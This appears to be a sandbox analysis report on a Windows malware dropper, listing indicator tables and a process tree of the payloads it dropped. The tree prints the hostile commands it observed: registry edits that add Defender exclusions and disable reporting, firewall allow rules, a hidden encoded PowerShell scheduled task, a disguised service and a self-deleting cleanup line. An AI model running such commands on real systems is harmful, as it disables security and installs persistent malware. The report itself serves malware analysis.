2776
2776
2776
2776
2776
2776
2776
2776
2776
2776
2776
2776
2776
2776
2776
2776
2776
2776
2776
2776
2776
2776
2776
2776
2776
2776
2776
2776

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

pub2.exe

pid process

3968 pub2.exe

Suspicious use of AdjustPrivilegeToken 63 IoCs

Processes:

KRSetp.exeInstall.exetaskkill.exemd9_1sjm.exeInfo.exesvchost.exeInfo.exeEr0LRVqpAAre3RUKdr0AbLjh.exe

description	pid	process
Token: SeDebugPrivilege	4656	KRSetp.exe
Token: SeCreateTokenPrivilege	3872	Install.exe
Token: SeAssignPrimaryTokenPrivilege	3872	Install.exe
Token: SeLockMemoryPrivilege	3872	Install.exe
Token: SeIncreaseQuotaPrivilege	3872	Install.exe
Token: SeMachineAccountPrivilege	3872	Install.exe
Token: SeTcbPrivilege	3872	Install.exe
Token: SeSecurityPrivilege	3872	Install.exe
Token: SeTakeOwnershipPrivilege	3872	Install.exe
Token: SeLoadDriverPrivilege	3872	Install.exe
Token: SeSystemProfilePrivilege	3872	Install.exe
Token: SeSystemtimePrivilege	3872	Install.exe
Token: SeProfSingleProcessPrivilege	3872	Install.exe
Token: SeIncBasePriorityPrivilege	3872	Install.exe
Token: SeCreatePagefilePrivilege	3872	Install.exe
Token: SeCreatePermanentPrivilege	3872	Install.exe
Token: SeBackupPrivilege	3872	Install.exe
Token: SeRestorePrivilege	3872	Install.exe
Token: SeShutdownPrivilege	3872	Install.exe
Token: SeDebugPrivilege	3872	Install.exe
Token: SeAuditPrivilege	3872	Install.exe
Token: SeSystemEnvironmentPrivilege	3872	Install.exe
Token: SeChangeNotifyPrivilege	3872	Install.exe
Token: SeRemoteShutdownPrivilege	3872	Install.exe
Token: SeUndockPrivilege	3872	Install.exe
Token: SeSyncAgentPrivilege	3872	Install.exe
Token: SeEnableDelegationPrivilege	3872	Install.exe
Token: SeManageVolumePrivilege	3872	Install.exe
Token: SeImpersonatePrivilege	3872	Install.exe
Token: SeCreateGlobalPrivilege	3872	Install.exe
Token: 31	3872	Install.exe
Token: 32	3872	Install.exe
Token: 33	3872	Install.exe
Token: 34	3872	Install.exe
Token: 35	3872	Install.exe
Token: SeDebugPrivilege	4012	taskkill.exe
Token: SeManageVolumePrivilege	3984	md9_1sjm.exe
Token: SeDebugPrivilege	2844	Info.exe
Token: SeImpersonatePrivilege	2844	Info.exe
Token: SeTcbPrivilege	1152	svchost.exe
Token: SeTcbPrivilege	1152	svchost.exe
Token: SeShutdownPrivilege	2776
Token: SeCreatePagefilePrivilege	2776
Token: SeShutdownPrivilege	2776
Token: SeCreatePagefilePrivilege	2776
Token: SeManageVolumePrivilege	3984	md9_1sjm.exe
Token: SeShutdownPrivilege	2776
Token: SeCreatePagefilePrivilege	2776
Token: SeSystemEnvironmentPrivilege	3184	Info.exe
Token: SeShutdownPrivilege	2776
Token: SeCreatePagefilePrivilege	2776
Token: SeManageVolumePrivilege	3984	md9_1sjm.exe
Token: SeShutdownPrivilege	2776
Token: SeCreatePagefilePrivilege	2776
Token: SeShutdownPrivilege	2776
Token: SeCreatePagefilePrivilege	2776
Token: SeDebugPrivilege	4868	Er0LRVqpAAre3RUKdr0AbLjh.exe
Token: SeShutdownPrivilege	2776
Token: SeCreatePagefilePrivilege	2776
Token: SeShutdownPrivilege	2776
Token: SeCreatePagefilePrivilege	2776
Token: SeShutdownPrivilege	2776
Token: SeCreatePagefilePrivilege	2776

Suspicious use of FindShellTrayWindow 10 IoCs

Processes:

mysetold.exe

pid	process
3960	mysetold.exe
3960	mysetold.exe
3960	mysetold.exe
3960	mysetold.exe
3960	mysetold.exe
3960	mysetold.exe
3960	mysetold.exe
3960	mysetold.exe
3960	mysetold.exe
3960	mysetold.exe

Suspicious use of SendNotifyMessage 10 IoCs

Processes:

mysetold.exe

pid	process
3960	mysetold.exe
3960	mysetold.exe
3960	mysetold.exe
3960	mysetold.exe
3960	mysetold.exe
3960	mysetold.exe
3960	mysetold.exe
3960	mysetold.exe
3960	mysetold.exe
3960	mysetold.exe

Suspicious use of SetWindowsHookEx 19 IoCs

Processes:

Installation.exeComplete.exek0DbgLakP6JOtlVMKCk6k5oM.exeWerFault.exeY3xgG0Ku2YL7jvWFr_C_lMSL.exef3ILg0ohBDYhwDd8XmudLTXB.exeGauN2MbLc5iG_X1BC9N3DR23.exekCgCBPutcCX8cCKa9QdPwNw8.exeqgrZ4T3Y9t884pwPPSXlbZtd.exeWerFault.exerundll32.exezGypfgWdUX9FLmVDCvxRTzRI.exeQ1VXnFC9tcEHkKRMyQDX70DJ.exebm3UC6bkNf0IcyjNSCbgK_aX.exeXU1oeoPOV0LVnPBA0aKAdCih.exe8DS88fSngpzKyrWWNkF0WWfc.exeFAasYmbDLLX8yWYVymTYV7s8.exeiJVfcQKzl4GP3F3mI2DUJYcU.exeInstall.exe

pid	process
4352	Installation.exe
4072	Complete.exe
4396	k0DbgLakP6JOtlVMKCk6k5oM.exe
2824	WerFault.exe
4424	Y3xgG0Ku2YL7jvWFr_C_lMSL.exe
4692	f3ILg0ohBDYhwDd8XmudLTXB.exe
2252	GauN2MbLc5iG_X1BC9N3DR23.exe
2280	kCgCBPutcCX8cCKa9QdPwNw8.exe
1244	qgrZ4T3Y9t884pwPPSXlbZtd.exe
2260	WerFault.exe
2432	rundll32.exe
1676	zGypfgWdUX9FLmVDCvxRTzRI.exe
4472	Q1VXnFC9tcEHkKRMyQDX70DJ.exe
2120	bm3UC6bkNf0IcyjNSCbgK_aX.exe
1464	XU1oeoPOV0LVnPBA0aKAdCih.exe
2208	8DS88fSngpzKyrWWNkF0WWfc.exe
3472	FAasYmbDLLX8yWYVymTYV7s8.exe
3096	iJVfcQKzl4GP3F3mI2DUJYcU.exe
4132	Install.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

7eb46cbaf93631a555e9d5318fddca520204eec37187f1328454441ca283cfb2.exeFiles.exemsedge.exeFolder.exeInstall.execmd.exerUNdlL32.eXesvchost.exeInfo.execmd.exeWerFault.exe

description	pid	process	target process
PID 2368 wrote to memory of 3152	2368	7eb46cbaf93631a555e9d5318fddca520204eec37187f1328454441ca283cfb2.exe	Files.exe
PID 2368 wrote to memory of 3152	2368	7eb46cbaf93631a555e9d5318fddca520204eec37187f1328454441ca283cfb2.exe	Files.exe
PID 2368 wrote to memory of 3152	2368	7eb46cbaf93631a555e9d5318fddca520204eec37187f1328454441ca283cfb2.exe	Files.exe
PID 2368 wrote to memory of 4656	2368	7eb46cbaf93631a555e9d5318fddca520204eec37187f1328454441ca283cfb2.exe	KRSetp.exe
PID 2368 wrote to memory of 4656	2368	7eb46cbaf93631a555e9d5318fddca520204eec37187f1328454441ca283cfb2.exe	KRSetp.exe
PID 3152 wrote to memory of 5108	3152	Files.exe	jfiag3g_gg.exe
PID 3152 wrote to memory of 5108	3152	Files.exe	jfiag3g_gg.exe
PID 3152 wrote to memory of 5108	3152	Files.exe	jfiag3g_gg.exe
PID 2368 wrote to memory of 3828	2368	7eb46cbaf93631a555e9d5318fddca520204eec37187f1328454441ca283cfb2.exe	msedge.exe
PID 2368 wrote to memory of 3828	2368	7eb46cbaf93631a555e9d5318fddca520204eec37187f1328454441ca283cfb2.exe	msedge.exe
PID 2368 wrote to memory of 3872	2368	7eb46cbaf93631a555e9d5318fddca520204eec37187f1328454441ca283cfb2.exe	Install.exe
PID 2368 wrote to memory of 3872	2368	7eb46cbaf93631a555e9d5318fddca520204eec37187f1328454441ca283cfb2.exe	Install.exe
PID 2368 wrote to memory of 3872	2368	7eb46cbaf93631a555e9d5318fddca520204eec37187f1328454441ca283cfb2.exe	Install.exe
PID 2368 wrote to memory of 4552	2368	7eb46cbaf93631a555e9d5318fddca520204eec37187f1328454441ca283cfb2.exe	Folder.exe
PID 2368 wrote to memory of 4552	2368	7eb46cbaf93631a555e9d5318fddca520204eec37187f1328454441ca283cfb2.exe	Folder.exe
PID 2368 wrote to memory of 4552	2368	7eb46cbaf93631a555e9d5318fddca520204eec37187f1328454441ca283cfb2.exe	Folder.exe
PID 2368 wrote to memory of 2844	2368	7eb46cbaf93631a555e9d5318fddca520204eec37187f1328454441ca283cfb2.exe	Info.exe
PID 2368 wrote to memory of 2844	2368	7eb46cbaf93631a555e9d5318fddca520204eec37187f1328454441ca283cfb2.exe	Info.exe
PID 2368 wrote to memory of 2844	2368	7eb46cbaf93631a555e9d5318fddca520204eec37187f1328454441ca283cfb2.exe	Info.exe
PID 2368 wrote to memory of 4352	2368	7eb46cbaf93631a555e9d5318fddca520204eec37187f1328454441ca283cfb2.exe	Installation.exe
PID 2368 wrote to memory of 4352	2368	7eb46cbaf93631a555e9d5318fddca520204eec37187f1328454441ca283cfb2.exe	Installation.exe
PID 2368 wrote to memory of 4352	2368	7eb46cbaf93631a555e9d5318fddca520204eec37187f1328454441ca283cfb2.exe	Installation.exe
PID 3828 wrote to memory of 4420	3828	msedge.exe	msedge.exe
PID 3828 wrote to memory of 4420	3828	msedge.exe	msedge.exe
PID 4552 wrote to memory of 4868	4552	Folder.exe	Folder.exe
PID 4552 wrote to memory of 4868	4552	Folder.exe	Folder.exe
PID 4552 wrote to memory of 4868	4552	Folder.exe	Folder.exe
PID 2368 wrote to memory of 3968	2368	7eb46cbaf93631a555e9d5318fddca520204eec37187f1328454441ca283cfb2.exe	pub2.exe
PID 2368 wrote to memory of 3968	2368	7eb46cbaf93631a555e9d5318fddca520204eec37187f1328454441ca283cfb2.exe	pub2.exe
PID 2368 wrote to memory of 3968	2368	7eb46cbaf93631a555e9d5318fddca520204eec37187f1328454441ca283cfb2.exe	pub2.exe
PID 2368 wrote to memory of 3960	2368	7eb46cbaf93631a555e9d5318fddca520204eec37187f1328454441ca283cfb2.exe	mysetold.exe
PID 2368 wrote to memory of 3960	2368	7eb46cbaf93631a555e9d5318fddca520204eec37187f1328454441ca283cfb2.exe	mysetold.exe
PID 2368 wrote to memory of 3960	2368	7eb46cbaf93631a555e9d5318fddca520204eec37187f1328454441ca283cfb2.exe	mysetold.exe
PID 2368 wrote to memory of 3984	2368	7eb46cbaf93631a555e9d5318fddca520204eec37187f1328454441ca283cfb2.exe	md9_1sjm.exe
PID 2368 wrote to memory of 3984	2368	7eb46cbaf93631a555e9d5318fddca520204eec37187f1328454441ca283cfb2.exe	md9_1sjm.exe
PID 2368 wrote to memory of 3984	2368	7eb46cbaf93631a555e9d5318fddca520204eec37187f1328454441ca283cfb2.exe	md9_1sjm.exe
PID 2368 wrote to memory of 4072	2368	7eb46cbaf93631a555e9d5318fddca520204eec37187f1328454441ca283cfb2.exe	Complete.exe
PID 2368 wrote to memory of 4072	2368	7eb46cbaf93631a555e9d5318fddca520204eec37187f1328454441ca283cfb2.exe	Complete.exe
PID 2368 wrote to memory of 4072	2368	7eb46cbaf93631a555e9d5318fddca520204eec37187f1328454441ca283cfb2.exe	Complete.exe
PID 3872 wrote to memory of 1896	3872	Install.exe	cmd.exe
PID 3872 wrote to memory of 1896	3872	Install.exe	cmd.exe
PID 3872 wrote to memory of 1896	3872	Install.exe	cmd.exe
PID 1896 wrote to memory of 4012	1896	cmd.exe	taskkill.exe
PID 1896 wrote to memory of 4012	1896	cmd.exe	taskkill.exe
PID 1896 wrote to memory of 4012	1896	cmd.exe	taskkill.exe
PID 4088 wrote to memory of 3992	4088	rUNdlL32.eXe	rundll32.exe
PID 4088 wrote to memory of 3992	4088	rUNdlL32.eXe	rundll32.exe
PID 4088 wrote to memory of 3992	4088	rUNdlL32.eXe	rundll32.exe
PID 3152 wrote to memory of 4388	3152	Files.exe	jfiag3g_gg.exe
PID 3152 wrote to memory of 4388	3152	Files.exe	jfiag3g_gg.exe
PID 3152 wrote to memory of 4388	3152	Files.exe	jfiag3g_gg.exe
PID 1152 wrote to memory of 3184	1152	svchost.exe	Info.exe
PID 1152 wrote to memory of 3184	1152	svchost.exe	Info.exe
PID 1152 wrote to memory of 3184	1152	svchost.exe	Info.exe
PID 3184 wrote to memory of 4640	3184	Info.exe	cmd.exe
PID 3184 wrote to memory of 4640	3184	Info.exe	cmd.exe
PID 4640 wrote to memory of 556	4640	cmd.exe	netsh.exe
PID 4640 wrote to memory of 556	4640	cmd.exe	netsh.exe
PID 3184 wrote to memory of 1112	3184	Info.exe	csrss.exe
PID 3184 wrote to memory of 1112	3184	Info.exe	csrss.exe
PID 3184 wrote to memory of 1112	3184	Info.exe	csrss.exe
PID 4072 wrote to memory of 4868	4072	WerFault.exe	Er0LRVqpAAre3RUKdr0AbLjh.exe
PID 4072 wrote to memory of 4868	4072	WerFault.exe	Er0LRVqpAAre3RUKdr0AbLjh.exe
PID 4072 wrote to memory of 2824	4072	WerFault.exe	WerFault.exe

C:\Users\Admin\AppData\Local\Temp\7eb46cbaf93631a555e9d5318fddca520204eec37187f1328454441ca283cfb2.exe
"C:\Users\Admin\AppData\Local\Temp\7eb46cbaf93631a555e9d5318fddca520204eec37187f1328454441ca283cfb2.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2368

C:\Users\Admin\AppData\Local\Temp\Files.exe
"C:\Users\Admin\AppData\Local\Temp\Files.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3152

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
PID:5108

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4388

C:\Users\Admin\AppData\Local\Temp\KRSetp.exe
"C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4656

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1wNij7
2⤵
- Suspicious use of WriteProcessMemory
PID:3828

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa345846f8,0x7ffa34584708,0x7ffa34584718
3⤵
PID:4420

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,12862904025574703389,12652758917982896663,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:2
3⤵
PID:4120

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,12862904025574703389,12652758917982896663,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2396 /prefetch:3
3⤵
PID:2164

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,12862904025574703389,12652758917982896663,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3124 /prefetch:8
3⤵
PID:4000

C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3872

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:1896

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4012

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4552

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a
3⤵
- Executes dropped EXE
PID:4868

C:\Users\Admin\AppData\Local\Temp\Info.exe
"C:\Users\Admin\AppData\Local\Temp\Info.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2844

C:\Users\Admin\AppData\Local\Temp\Info.exe
"C:\Users\Admin\AppData\Local\Temp\Info.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3184

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
4⤵
- Suspicious use of WriteProcessMemory
PID:4640

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
5⤵
PID:556

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /94-94
4⤵
- Executes dropped EXE
PID:1112

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
5⤵
- Creates scheduled task(s)
PID:2156

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
PID:4612

C:\Users\Admin\AppData\Local\Temp\Installation.exe
"C:\Users\Admin\AppData\Local\Temp\Installation.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4352

C:\Users\Admin\Pictures\Adobe Films\x2GmMTUR8nopt4mNmrgLTjxx.exe
"C:\Users\Admin\Pictures\Adobe Films\x2GmMTUR8nopt4mNmrgLTjxx.exe"
3⤵
PID:2520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4352 -s 804
3⤵
- Program crash
PID:4864

C:\Users\Admin\AppData\Local\Temp\pub2.exe
"C:\Users\Admin\AppData\Local\Temp\pub2.exe"
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3968

C:\Users\Admin\AppData\Local\Temp\mysetold.exe
"C:\Users\Admin\AppData\Local\Temp\mysetold.exe"
2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3960

C:\Users\Admin\AppData\Local\Temp\Complete.exe
"C:\Users\Admin\AppData\Local\Temp\Complete.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4072

C:\Users\Admin\Documents\Er0LRVqpAAre3RUKdr0AbLjh.exe
"C:\Users\Admin\Documents\Er0LRVqpAAre3RUKdr0AbLjh.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4868

C:\Users\Admin\AppData\Local\Temp\992718d5-a21e-46e4-9947-3c97cf666a7e.exe
"C:\Users\Admin\AppData\Local\Temp\992718d5-a21e-46e4-9947-3c97cf666a7e.exe"
4⤵
PID:2088

C:\Users\Admin\Documents\Y3xgG0Ku2YL7jvWFr_C_lMSL.exe
"C:\Users\Admin\Documents\Y3xgG0Ku2YL7jvWFr_C_lMSL.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4424 -s 460
4⤵
- Program crash
PID:1420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4424 -s 468
4⤵
- Program crash
PID:824

C:\Users\Admin\Documents\fYl4lnIJ67L8Zoh6kixaMhmL.exe
"C:\Users\Admin\Documents\fYl4lnIJ67L8Zoh6kixaMhmL.exe"
3⤵
- Executes dropped EXE
PID:60

C:\Users\Admin\Documents\8DS88fSngpzKyrWWNkF0WWfc.exe
"C:\Users\Admin\Documents\8DS88fSngpzKyrWWNkF0WWfc.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2208

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\poipslko\
4⤵
PID:4500

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\iowejrgv.exe" C:\Windows\SysWOW64\poipslko\
4⤵
PID:4416

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create poipslko binPath= "C:\Windows\SysWOW64\poipslko\iowejrgv.exe /d\"C:\Users\Admin\Documents\8DS88fSngpzKyrWWNkF0WWfc.exe\"" type= own start= auto DisplayName= "wifi support"
4⤵
PID:4452

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description poipslko "wifi internet conection"
4⤵
PID:4780

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start poipslko
4⤵
PID:1896

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
4⤵
PID:3912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2208 -s 1192
4⤵
- Program crash
PID:2156

C:\Users\Admin\Documents\FAasYmbDLLX8yWYVymTYV7s8.exe
"C:\Users\Admin\Documents\FAasYmbDLLX8yWYVymTYV7s8.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3472

C:\Users\Admin\AppData\Local\Temp\7zSB3DC.tmp\Install.exe
.\Install.exe
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4132

C:\Users\Admin\AppData\Local\Temp\7zSC2B1.tmp\Install.exe
.\Install.exe /S /site_id "525403"
5⤵
PID:4512

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
6⤵
PID:3064

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
7⤵
PID:2556

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
8⤵
PID:1504

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
8⤵
PID:2164

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
6⤵
PID:1928

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
- Executes dropped EXE
PID:3876

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
7⤵
PID:4768

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
8⤵
PID:2256

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
8⤵
PID:1716

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gOJjvTnap" /SC once /ST 19:26:10 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
6⤵
- Creates scheduled task(s)
PID:4376

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gOJjvTnap"
6⤵
PID:2368

C:\Users\Admin\Documents\cUN3RxYe388WHUs8bwLd19Nn.exe
"C:\Users\Admin\Documents\cUN3RxYe388WHUs8bwLd19Nn.exe"
3⤵
- Executes dropped EXE
PID:3560

C:\Users\Admin\Documents\XU1oeoPOV0LVnPBA0aKAdCih.exe
"C:\Users\Admin\Documents\XU1oeoPOV0LVnPBA0aKAdCih.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1464

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1464 -s 920
4⤵
- Program crash
PID:2256

C:\Users\Admin\Documents\Q1VXnFC9tcEHkKRMyQDX70DJ.exe
"C:\Users\Admin\Documents\Q1VXnFC9tcEHkKRMyQDX70DJ.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4472

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
4⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetWindowsHookEx
PID:2432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 600
4⤵
- Program crash
PID:4672

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 940
4⤵
- Program crash
PID:4360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 868
4⤵
- Program crash
PID:4336

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 1044
4⤵
- Program crash
PID:4316

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
4⤵
PID:1316

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 948
4⤵
- Program crash
PID:4916

C:\Users\Admin\Documents\zPRDvdwa8pkmyU5hvddAhkBi.exe
"C:\Users\Admin\Documents\zPRDvdwa8pkmyU5hvddAhkBi.exe"
3⤵
PID:2260

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im zPRDvdwa8pkmyU5hvddAhkBi.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\zPRDvdwa8pkmyU5hvddAhkBi.exe" & del C:\ProgramData\*.dll & exit
4⤵
PID:5072

C:\Windows\SysWOW64\taskkill.exe
taskkill /im zPRDvdwa8pkmyU5hvddAhkBi.exe /f
5⤵
- Kills process with taskkill
PID:5080

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
5⤵
- Delays execution with timeout.exe
PID:3196

C:\Users\Admin\Documents\iJVfcQKzl4GP3F3mI2DUJYcU.exe
